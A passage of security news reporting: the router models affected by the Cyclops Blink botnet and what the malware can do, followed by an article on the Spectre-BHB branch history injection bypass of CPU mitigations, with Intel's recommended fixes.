  • RT-AC5300 firmware under 3.0.0.4.386.xxxx
  • RT-AC88U firmware under 3.0.0.4.386.xxxx
  • RT-AC3100 firmware under 3.0.0.4.386.xxxx
  • RT-AC86U firmware under 3.0.0.4.386.xxxx
  • RT-AC68U, AC68R, AC68W, AC68P firmware under 3.0.0.4.386.xxxx
  • RT-AC66U_B1 firmware under 3.0.0.4.386.xxxx
  • RT-AC3200 firmware under 3.0.0.4.386.xxxx
  • RT-AC2900 firmware under 3.0.0.4.386.xxxx
  • RT-AC1900P, RT-AC1900P firmware under 3.0.0.4.386.xxxx
  • RT-AC87U (end-of-life)
  • RT-AC66U (end-of-life), and
  • RT-AC56U (end-of-life)
Apart from employing OpenSSL to encrypt connections with its command-and-control (C2) servers, Cyclops Blink also includes specific modules that can read and write from the devices' flash memory, allowing it to persist and survive factory resets. A second reconnaissance module acts as a medium for exfiltrating data from the hacked device to the C2 server, while a file download component is responsible for retrieving arbitrary payloads through HTTPS. Although the exact form of initial access is unknown, Cyclops Blink has been affecting WatchGuard and Asus routers in the United States, India, Italy, Canada, and Russia since June 2019. 

A law firm in Europe, a medium-sized entity producing medical equipment for dentists in Southern Europe, and a plumbing company in the United States are among the impacted hosts. Because of the infrequency with which IoT devices and routers are patched and the lack of security software, Trend Micro has warned that this might lead to the establishment of "eternal botnets."

The researchers stated, "Once an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying, or anything else that the attacker wants to do. In the case of Cyclops Blink, we have seen devices that were compromised for over 30 months (about two and a half years) in a row and were being set up as stable command-and-control servers for other bots."

New Exploit Circumvents Existing Spectre-V2 Mitigations in Intel and Arm CPUs

 

Researchers have revealed a new technique that might be used to bypass existing hardware mitigations in modern processors from Intel, AMD, and Arm CPUs and stage speculative execution attacks like Spektre to expose sensitive data from host memory. 

Spectre attacks are aimed to disrupt the isolation between different applications by using an optimization technique known as speculative execution in CPU hardware implementations to mislead programmes into accessing arbitrary memory regions and leaking their secrets. While chipmakers have included software and hardware defences such as Retpoline and safeguards such as Enhanced Indirect Branch Restricted Speculation (eIBRS) and Arm CSV2, the latest technique demonstrated by VUSec researchers seek to circumvent all of these measures. 

Branch History Injection (BHI or Spectre-BHB) is a new variant of Spectre-V2 attacks (tracked as CVE-2017-5715) that circumvent both eIBRS and CSV2, according to the researchers, and exposes arbitrary kernel memory on modern Intel CPUs.

"The hardware mitigations do prevent the unprivileged attacker from injecting predictor entries for the kernel," the researchers explained,

"However, the predictor relies on a global history to select the target entries to speculatively execute. And the attacker can poison this history from userland to force the kernel to mispredict to more 'interesting' kernel targets (i.e., gadgets) that leak data," the Systems and Network Security Group at Vrije Universiteit Amsterdam added. 

To put it another way, malicious code can use the CPU Branch History Buffer (BHBshared )'s branch history to affect mispredicted branches within the victim's hardware context, leading to speculative execution that can subsequently be used to infer information that would otherwise be inaccessible. All Intel and Arm processors that were previously vulnerable to Spectre-V2, as well as a number of AMD chipsets, are now vulnerable to Spectre-BHB, forcing the three firms to release software upgrades to address the problem. 

Customers should also disable the unprivileged extended Berkeley Packet Filters (eBPF) in Linux, enable both eIBRS and Supervisor-Mode Execution Prevention (SMEP), and apply LFENCE to particularly identified gadgets that are discovered to be susceptible, according to Intel. 

The researchers stated, "The [Intel eIBRS and Arm CSV2] mitigations work as intended, but the residual attack surface is much more significant than vendors originally assumed. Nevertheless, finding exploitable gadgets is harder than before since the attacker can't directly inject predictor targets across privilege boundaries. That is, the kernel won't speculatively jump to arbitrary attacker-provided targets, but will only speculatively execute valid code snippets it already executed in the past."